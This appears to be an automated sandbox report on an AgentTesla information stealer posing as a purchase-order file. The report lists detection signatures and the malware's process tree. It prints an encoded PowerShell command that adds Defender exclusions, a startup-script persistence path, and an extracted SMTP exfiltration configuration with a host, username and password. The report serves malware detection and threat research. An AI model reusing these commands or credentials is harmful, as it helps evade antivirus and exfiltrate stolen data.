Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase order T&B19-20PO128.exe

Overview

General Information

Sample name:purchase order T&B19-20PO128.exe
Analysis ID:1637288
MD5:55591f3ecbc94b72a676c291e52162d3
SHA1:281ea790d893650b6c8d556e30b6cc95d4dfc3f1
SHA256:a9ad45025dcd9e6cf6b61668033310fd7f72aed9cd5193cc9dff7dfec56ecd61
Tags:exeuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Encrypted powershell cmdline option found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • purchase order T&B19-20PO128.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe" MD5: 55591F3ECBC94B72A676C291E52162D3)
    • cmd.exe (PID: 7272 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 7488 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
    • powershell.exe (PID: 5344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • InstallUtil.exe (PID: 2072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • cmd.exe (PID: 1040 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 1008 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • wscript.exe (PID: 2592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ofg.exe (PID: 3932 cmdline: "C:\Users\user\AppData\Roaming\ofg.exe" MD5: 55591F3ECBC94B72A676C291E52162D3)
      • cmd.exe (PID: 7848 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 8064 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • InstallUtil.exe (PID: 756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • cmd.exe (PID: 7128 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3444 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "admin@iaa-airferight.com", "Password": "manlikeyou88"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000016.00000002.2387668752.0000000002E3E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 29 entries
            SourceRuleDescriptionAuthorStrings
            18.2.ofg.exe.391cf50.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.purchase order T&B19-20PO128.exe.5820000.12.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.purchase order T&B19-20PO128.exe.3519550.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.purchase order T&B19-20PO128.exe.3519550.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    18.2.ofg.exe.37a9d87.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 15 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe", ParentImage: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe, ParentProcessId: 8136, ParentProcessName: purchase order T&B19-20PO128.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 7272, ProcessName: cmd.exe
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe", ParentImage: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe, ParentProcessId: 8136, ParentProcessName: purchase order T&B19-20PO128.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 7272, ProcessName: cmd.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe", ParentImage: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe, ParentProcessId: 8136, ParentProcessName: purchase order T&B19-20PO128.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGM
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" , ProcessId: 2592, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe", ParentImage: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe, ParentProcessId: 8136, ParentProcessName: purchase order T&B19-20PO128.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGM
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 2072, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51694
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs" , ProcessId: 2592, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe", ParentImage: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe, ParentProcessId: 8136, ParentProcessName: purchase order T&B19-20PO128.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGM

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe, ProcessId: 8136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: purchase order T&B19-20PO128.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\ofg.exeAvira: detection malicious, Label: TR/Kryptik.jlnse
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "admin@iaa-airferight.com", "Password": "manlikeyou88"}
                      Source: C:\Users\user\AppData\Roaming\ofg.exeReversingLabs: Detection: 28%
                      Source: purchase order T&B19-20PO128.exeVirustotal: Detection: 43%Perma Link
                      Source: purchase order T&B19-20PO128.exeReversingLabs: Detection: 28%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
